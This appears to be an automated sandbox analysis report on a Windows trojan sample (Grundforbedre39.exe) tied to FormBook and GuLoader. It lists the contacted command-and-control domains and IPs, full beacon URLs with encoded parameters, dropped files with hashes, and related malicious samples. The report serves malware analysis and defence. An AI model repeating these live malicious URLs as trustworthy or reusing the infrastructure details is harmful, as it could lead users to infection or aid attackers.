        http://www.teenpattimasterapp.org/m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        webredir.vip.gandi.net
        		217.70.184.50
        		truefalse
          		high
          feshi.store
          		84.32.84.32
          		truetrue
            		unknown
            www.noonartists.com
            		172.67.158.92
            		truetrue
              		unknown
              guiguigohost.com
              		195.110.124.133
              		truetrue
                		unknown
                parkingpage.namecheap.com
                		91.195.240.19
                		truefalse
                  		high
                  drive.usercontent.google.com
                  		142.250.65.161
                  		truefalse
                    		high
                    www.t3c1srf.site
                    		156.232.32.175
                    		truefalse
                      		unknown
                      www.alpinebretech.life
                      		198.177.123.106
                      		truetrue
                        		unknown
                        www.manupaint.com
                        		46.30.215.63
                        		truetrue
                          		unknown
                          0dc4ed.qsnode301.com
                          		192.151.224.197
                          		truefalse
                            		unknown
                            drive.google.com
                            		142.251.41.14
                            		truefalse
                              		high
                              teenpattimasterapp.org
                              		84.32.84.32
                              		truetrue
                                		unknown
                                www.wbyzm5.buzz
                                		172.67.130.3
                                		truetrue
                                  		unknown
                                  meliorras.com
                                  		84.32.84.32
                                  		truetrue
                                    		unknown
                                    www.tyc8099a.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.feshi.store
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.teenpattimasterapp.org
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.cyberpsychsecurity.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.meliorras.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.plainpathproductions.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.spazisostenibili.org
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.alwaysgaia.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.foundationtest.site
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.guiguigohost.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.getworthiness.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.manupaint.com/m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wbyzm5.buzz/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wbyzm5.buzz/m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.teenpattimasterapp.org/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.plainpathproductions.com/m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.manupaint.com/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.noonartists.com/m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.alpinebretech.life/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.feshi.store/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.meliorras.com/m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.plainpathproductions.com/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.feshi.store/m9so/?LFPxWlV=1Qsa/7J+srdsR8Dz/ES5S27r13qOWkq23euP4yB+JqRfE/nsbLJ5FW7PdqHJizPjrTq31E4BOQDA72YgssNaoReb8a5kH4cRUYabd93Dw2rUjSskRvR+x9I=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.guiguigohost.com/m9so/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.cyberpsychsecurity.com/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.alpinebretech.life/m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cyberpsychsecurity.com/m9so/?LFPxWlV=jovxqEZjMvfd7zz2mTvvE1OonaQx4w6Z/02MEDusjhfET0PBGFNNsERdDgiHq90zA+FiNHbHunAjmlnnTBHWzyxLPlfgZ5XyFdT5RHsnhVfKl1JVA017Cgw=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.meliorras.com/m9so/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.teenpattimasterapp.org/m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhXtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://nsis.sf.net/NSIS_ErrorErrorGrundforbedre39.exe, 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000000.00000000.792517395.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000004.00000000.1037768480.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDGrundforbedre39.exe, 00000004.00000001.1042132222.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                              		high
                                                              http://www.gopher.ftp://ftp.Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://drive.google.com/Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.com/UGrundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.quovadis.bm0Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ocsp.quovadisoffshore.com0Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.251.41.14
                                                                  		drive.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  172.67.158.92
                                                                  		www.noonartists.comUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  195.110.124.133
                                                                  		guiguigohost.comItaly
                                                                  		39729REGISTER-ASITtrue
                                                                  198.177.123.106
                                                                  		www.alpinebretech.lifeUnited States
                                                                  		395681FINALFRONTIERVGtrue
                                                                  142.250.65.161
                                                                  		drive.usercontent.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  46.30.215.63
                                                                  		www.manupaint.comDenmark
                                                                  		51468ONECOMDKtrue
                                                                  84.32.84.32
                                                                  		feshi.storeLithuania
                                                                  		33922NTT-LT-ASLTtrue
                                                                  217.70.184.50
                                                                  		webredir.vip.gandi.netFrance
                                                                  		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                  192.151.224.197
                                                                  		0dc4ed.qsnode301.comUnited States
                                                                  		40065CNSERVERSUSfalse
                                                                  91.195.240.19
                                                                  		parkingpage.namecheap.comGermany
                                                                  		47846SEDO-ASDEfalse
                                                                  156.232.32.175
                                                                  		www.t3c1srf.siteSeychelles
                                                                  		8100ASN-QUADRANET-GLOBALUSfalse
                                                                  172.67.130.3
                                                                  		www.wbyzm5.buzzUnited States
                                                                  		13335CLOUDFLARENETUStrue

                                                                  General Information

                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                  Analysis ID:1410990
                                                                  Start date and time:2024-03-18 14:43:54 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 18m 36s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                  Run name:Suspected Instruction Hammering
                                                                  Number of analysed new started processes analysed:31
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Grundforbedre39.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/10@60/12
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 93%
                                                                  • Number of executed functions: 90
                                                                  • Number of non-executed functions: 293
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com, tse1.mm.bing.net, settings-win.data.microsoft.com, g.bing.com, arc.msn.com
                                                                  • Execution Graph export aborted for target aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, PID 2820 because it is empty
                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: Grundforbedre39.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  14:48:14API Interceptor39442811x Sleep call for process: netiougc.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  172.67.158.92Snackbaren.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.noonartists.com/5ogg/
                                                                  195.110.124.133Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.guiguigohost.com/m9so/
                                                                  oZF2kXw4ZRc8NjL.exeGet hashmaliciousFormBookBrowse
                                                                  • www.rcpbooks.site/ns03/?wHut=ghlHUvuPX&yBkpfpPX=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
                                                                  Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.guiguigohost.com/m9so/
                                                                  Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.guiguigohost.com/m9so/
                                                                  Yolk.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.radiciholding.com/hjen/
                                                                  Americanistic57.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.radiciholding.com/hjen/
                                                                  Sjakres.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.guiguigohost.com/m9so/
                                                                  Respecialist.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.colossuspay.info/5ogg/?-R=5seNH68y29J+6BK6K5Aud34rlhYd82+taX3lccjYNYKrO4aANup35xVaAyNXtR3SpISecMo8tBNEpEjQy6kT16pU6H3VvcN9u+o99s7UxycFIOvTveySBXI=&dLF=GViH
                                                                  Batteriforeningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.guiguigohost.com/m9so/
                                                                  Adonissen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.guiguigohost.com/m9so/
                                                                  198.177.123.106venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.quantumjunction.top/5ogg/
                                                                  Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.quantumjunction.top/5ogg/
                                                                  rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.stellerechoes.xyz/v3ka/?Tnn=Sxv4&1T=GFfLE978cTjgJhl1mwUYbE5kXfR5gz6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3lctYW3c8py2i2Lm0Nk=
                                                                  Ckswuxhusyynxl.exe.Direct download.exeGet hashmaliciousDeal Ply, DBatLoader, FormBookBrowse
                                                                  • www.quantumjunction.top/3rwr/
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.stellerechoes.xyz/v3ka/
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.stellerechoes.xyz/v3ka/
                                                                  Fishpoles.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.quantumjunction.top/5ogg/
                                                                  Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.alpinebretech.life/m9so/
                                                                  Moderatestes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.pizalpioneer.top/gu1b/
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.stellerechoes.xyz/v3ka/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  webredir.vip.gandi.netApexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  Retorikker.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  Sjakres.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  MCdhfoPPYvL8Y64.exeGet hashmaliciousFormBookBrowse
                                                                  • 217.70.184.50
                                                                  Respecialist.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  Batteriforeningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  Adonissen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  pYeAlZOjQA.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 217.70.184.50
                                                                  www.noonartists.comApexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 172.67.158.92
                                                                  Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 104.21.74.122
                                                                  Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 104.21.74.122
                                                                  Retorikker.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 172.67.158.92
                                                                  Sjakres.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 104.21.74.122
                                                                  Forskergruppen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 104.21.74.122
                                                                  Batteriforeningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 104.21.74.122
                                                                  Adonissen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 172.67.158.92
                                                                  Snackbaren.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 172.67.158.92
                                                                  pYeAlZOjQA.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 172.67.158.92

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  NTT-LT-ASLTgMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.92
                                                                  iU3WGoA77BdiFdA.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  3gueXq7uYl.elfGet hashmaliciousMiraiBrowse
                                                                  • 84.32.221.200
                                                                  https://snorkellitfs.com/Get hashmaliciousUnknownBrowse
                                                                  • 84.32.84.32
                                                                  PO-31789R3WY-10_docx.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  http://shortens.meGet hashmaliciousUnknownBrowse
                                                                  • 84.32.84.173
                                                                  xjyn487lg15.dllGet hashmaliciousBumbleBeeBrowse
                                                                  • 84.32.84.32
                                                                  PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 84.32.84.32
                                                                  9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 84.32.84.32
                                                                  Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  CLOUDFLARENETUShttps://cloudflare-ipfs.com/ipfs/bafkreif2klim7glbgcsrfe6lm7wfd2scwmhee5i6dglyggzgvjgl53zw2i/#a2J1cnJAaG9tZWFpZC5vcmc=Get hashmaliciousUnknownBrowse
                                                                  • 104.17.64.14
                                                                  BANK DETAILS CORRECTIONS.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 104.21.63.135
                                                                  i5NDVAFg42.exeGet hashmaliciousFormBookBrowse
                                                                  • 104.16.36.105
                                                                  duGqHKp0OUXaX1D.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 104.21.23.10
                                                                  Clear-EasyPrint.b7002.ntclear.top.SK008.ch.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.64.41.3
                                                                  ekstre_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                  • 104.26.13.205
                                                                  FVN001-230824.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.74.152
                                                                  Quote.exeGet hashmaliciousFormBookBrowse
                                                                  • 104.21.56.165
                                                                  PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 104.26.13.205
                                                                  proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.67.152
                                                                  REGISTER-ASITvenerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 195.110.124.133
                                                                  CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                  • 81.88.48.71
                                                                  http://renovaciondepatentes.webnode.esGet hashmaliciousUnknownBrowse
                                                                  • 81.88.57.79
                                                                  Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 195.110.124.133
                                                                  oZF2kXw4ZRc8NjL.exeGet hashmaliciousFormBookBrowse
                                                                  • 195.110.124.133
                                                                  Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 195.110.124.133
                                                                  Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 195.110.124.133
                                                                  Yolk.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 195.110.124.133
                                                                  Lokalplanlgningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 195.110.124.133
                                                                  Americanistic57.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 195.110.124.133
                                                                  ONECOMDKhttps://www.thestarnewstoday.com/Get hashmaliciousUnknownBrowse
                                                                  • 195.47.247.17
                                                                  logo trademark license agreement 97698.jsGet hashmaliciousUnknownBrowse
                                                                  • 46.30.213.131
                                                                  Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.63
                                                                  Moderatestes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.18
                                                                  Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.63
                                                                  Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.63
                                                                  Retorikker.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.63
                                                                  Scsi.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.18
                                                                  Axoplasm.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.18
                                                                  Sjakres.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 46.30.215.63
                                                                  FINALFRONTIERVGvenerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Ckswuxhusyynxl.exe.Direct download.exeGet hashmaliciousDeal Ply, DBatLoader, FormBookBrowse
                                                                  • 198.177.123.106
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Fishpoles.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  Moderatestes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 198.177.123.106

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  37f463bf4616ecd445d4a1937da06e19Quote.exeGet hashmaliciousFormBookBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  QUOTE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  SSDAIG33Zh.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  Vindegade.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  reundertake.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  Request for quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161
                                                                  DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.251.41.14
                                                                  • 142.250.65.161

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dllcomprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                                    cuenta para pago1.exeGet hashmaliciousGuLoaderBrowse
                                                                      venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        venerationens.exeGet hashmaliciousGuLoaderBrowse
                                                                          Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            Interviewed.exeGet hashmaliciousGuLoaderBrowse
                                                                              Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  Afslrings.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\4KM2yMOK9O

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\netiougc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                    Category:dropped
                                                                                    Size (bytes):122880
                                                                                    Entropy (8bit):1.1414673161713362
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.656126712214018
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                                    MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                                    SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                                    SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
